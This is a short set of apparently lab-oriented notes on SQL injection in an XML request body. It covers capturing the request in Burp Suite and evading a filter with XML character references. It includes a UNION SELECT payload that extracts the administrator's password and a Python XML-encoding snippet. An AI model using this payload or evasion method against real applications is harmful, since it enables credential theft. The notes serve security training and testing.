XML
Steps
- Capture the request in Burp Suite (the body carries some sort of XML)
- Find the number of columns (you can simply guess it from the output of the original request)
- When trying to bypass a filter, you may find that simply URL-encoding the request does not work; this is because XML uses its own encoding (More information ---> HERE)
- Also, here we are trying to encode individual characters (this is different from simple URL encoding)
- Using XML character references (&#...;), we can see that the SQL injection is valid
Query Example
# Not Encoded
4 UNION SELECT password FROM users WHERE username='administrator'--
# Encoded (the same query with its characters replaced by XML character references; the references did not survive the rendering of this page, so only the decoded text is shown)
4 UNION SELECT password FROM users WHERE username='administrator'--
Tool (Python)
XML encoder (can be modified to encode individual characters)
import xml.sax.saxutils

# Define the string to be encoded
string = "this is a string to be XML encoded"

# escape() always replaces &, < and > with &amp;, &lt; and &gt; on its own;
# the extra mapping adds replacements for characters it leaves alone
# (listing &, < or > here again would double-encode them)
encoded_string = xml.sax.saxutils.escape(string, {
    "'": "&apos;",  # Single quote
    '"': "&quot;",  # Double quote
    " ": "&#x20;",  # Space, as a hexadecimal character reference
})

# Print the encoded string
print(encoded_string)